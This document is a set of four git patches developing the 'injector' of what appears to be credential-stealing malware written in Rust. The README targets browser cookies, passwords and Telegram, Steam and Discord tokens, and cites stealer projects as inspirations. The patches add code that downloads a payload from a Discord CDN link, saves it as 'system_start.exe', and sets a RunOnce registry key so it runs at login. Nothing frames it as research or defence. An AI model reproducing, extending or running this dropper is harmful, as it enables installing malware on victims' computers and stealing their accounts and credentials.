From 907babc3d48754d98db0786a76e859bb71ba4acb Mon Sep 17 00:00:00 2001
From: User <user@debian-BULLSEYE-live-builder-AMD64>
Date: Mon, 15 May 2023 13:26:30 +0200
Subject: [PATCH 1/4] Inspirations

---
 README.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/README.md b/README.md
index 0a49126..208f5e6 100644
--- a/README.md
+++ b/README.md
@@ -26,3 +26,9 @@ Additional:
 - anti-VM, anti-debug
 - packing
 - obfuscation
+
+## Inspirations
+
+https://github.com/Abdulrhmanbk/discoon-malware/
+
+https://github.com/doenerium69/doenerium
-- 
GitLab


From 2bb928d95d3015ba87248b9d29c7e3174261f993 Mon Sep 17 00:00:00 2001
From: User <user@debian-BULLSEYE-live-builder-AMD64>
Date: Wed, 17 May 2023 14:31:26 +0200
Subject: [PATCH 2/4] Injector can download to home dir

---
 injector/Cargo.toml  |  1 +
 injector/src/main.rs | 23 ++++++++++++++++++-----
 2 files changed, 19 insertions(+), 5 deletions(-)

diff --git a/injector/Cargo.toml b/injector/Cargo.toml
index 8e92751..a06d1e5 100644
--- a/injector/Cargo.toml
+++ b/injector/Cargo.toml
@@ -8,3 +8,4 @@ edition = "2021"
 [dependencies]
 reqwest = "*"
 tokio = { version = "1", features = ["full"] }
+directories = "5.0.1"
diff --git a/injector/src/main.rs b/injector/src/main.rs
index 63a2560..af69aed 100644
--- a/injector/src/main.rs
+++ b/injector/src/main.rs
@@ -1,4 +1,5 @@
 use std::{io::Cursor, env::var_os};
+use directories::UserDirs;
 type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>;
  
 async fn fetch_url(url: String, file_name: String) -> Result<()> {
@@ -11,9 +12,21 @@ async fn fetch_url(url: String, file_name: String) -> Result<()> {
  
 #[tokio::main]
 async fn main() {
-    let test = var_os("APPDATA").unwrap();
-    let appdata = test.to_str().unwrap();
-    let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe";
-    let startup = format!("{}{}", appdata, right_path);
-    fetch_url("URL HERE".to_string(), startup.to_string()).await.unwrap();
+
+    if true {
+        let user_dirs = UserDirs::new().unwrap() ;
+        let homedir = user_dirs.home_dir().to_str().unwrap();
+        let path = format!("{}{}", homedir, "\\system_start.exe");
+
+        fetch_url("https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(), path.to_string()).await.unwrap();
+
+    }else{
+        let test = var_os("APPDATA").unwrap();
+        let appdata = test.to_str().unwrap();
+        let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe";
+        let path = format!("{}{}", appdata, right_path);
+
+        fetch_url("URL HERE".to_string(), path.to_string()).await.unwrap();
+
+    }
 }
-- 
GitLab


From a76eb38f72c29f4d4f290044f8d1d456ad7744cd Mon Sep 17 00:00:00 2001
From: User <user@debian-BULLSEYE-live-builder-AMD64>
Date: Thu, 18 May 2023 22:09:39 +0200
Subject: [PATCH 3/4] Injector adds payload path to registry

---
 injector/Cargo.toml  |  1 +
 injector/src/main.rs | 11 +++++++++++
 2 files changed, 12 insertions(+)

diff --git a/injector/Cargo.toml b/injector/Cargo.toml
index a06d1e5..0f246f9 100644
--- a/injector/Cargo.toml
+++ b/injector/Cargo.toml
@@ -9,3 +9,4 @@ edition = "2021"
 reqwest = "*"
 tokio = { version = "1", features = ["full"] }
 directories = "5.0.1"
+winreg = "0.50.0"
diff --git a/injector/src/main.rs b/injector/src/main.rs
index af69aed..1e446d4 100644
--- a/injector/src/main.rs
+++ b/injector/src/main.rs
@@ -1,5 +1,8 @@
 use std::{io::Cursor, env::var_os};
 use directories::UserDirs;
+use std::path::Path;
+use winreg::enums::*;
+use winreg::RegKey;
 type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>;
  
 async fn fetch_url(url: String, file_name: String) -> Result<()> {
@@ -20,6 +23,14 @@ async fn main() {
 
         fetch_url("https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(), path.to_string()).await.unwrap();
 
+        let hkcu = RegKey::predef(HKEY_CURRENT_USER);
+        let reg_path = Path::new("Software")   
+            .join("Microsoft")
+            .join("Windows")
+            .join("CurrentVersion")
+            .join("RunOnce");
+        let (key, _) = hkcu.create_subkey(&reg_path).unwrap();
+        key.set_value("System start", &path).unwrap();
     }else{
         let test = var_os("APPDATA").unwrap();
         let appdata = test.to_str().unwrap();
-- 
GitLab


From adf3926b28bac3d4c2391af70dbcebd72fcde2fd Mon Sep 17 00:00:00 2001
From: User <user@debian-BULLSEYE-live-builder-AMD64>
Date: Thu, 18 May 2023 22:18:46 +0200
Subject: [PATCH 4/4] Payload url in injector's download function

---
 README.md            | 2 +-
 injector/src/main.rs | 7 ++++---
 2 files changed, 5 insertions(+), 4 deletions(-)

diff --git a/README.md b/README.md
index 208f5e6..4e094ba 100644
--- a/README.md
+++ b/README.md
@@ -22,7 +22,7 @@ Additional:
 - browser cookies
 - browser passwords
 - telegram, steam, discord tokens
-- persistence via regkey
+- persistence via regkey ✅
 - anti-VM, anti-debug
 - packing
 - obfuscation
diff --git a/injector/src/main.rs b/injector/src/main.rs
index 1e446d4..90756cc 100644
--- a/injector/src/main.rs
+++ b/injector/src/main.rs
@@ -5,7 +5,8 @@ use winreg::enums::*;
 use winreg::RegKey;
 type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>;
  
-async fn fetch_url(url: String, file_name: String) -> Result<()> {
+async fn download_payload(file_name: String) -> Result<()> {
+    let url = "https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string();
     let response = reqwest::get(url).await?;
     let mut file = std::fs::File::create(file_name)?;
     let mut content =  Cursor::new(response.bytes().await?);
@@ -21,7 +22,7 @@ async fn main() {
         let homedir = user_dirs.home_dir().to_str().unwrap();
         let path = format!("{}{}", homedir, "\\system_start.exe");
 
-        fetch_url("https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(), path.to_string()).await.unwrap();
+        download_payload(path.to_string()).await.unwrap();
 
         let hkcu = RegKey::predef(HKEY_CURRENT_USER);
         let reg_path = Path::new("Software")   
@@ -37,7 +38,7 @@ async fn main() {
         let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe";
         let path = format!("{}{}", appdata, right_path);
 
-        fetch_url("URL HERE".to_string(), path.to_string()).await.unwrap();
+        download_payload(path.to_string()).await.unwrap();
 
     }
 }
-- 
GitLab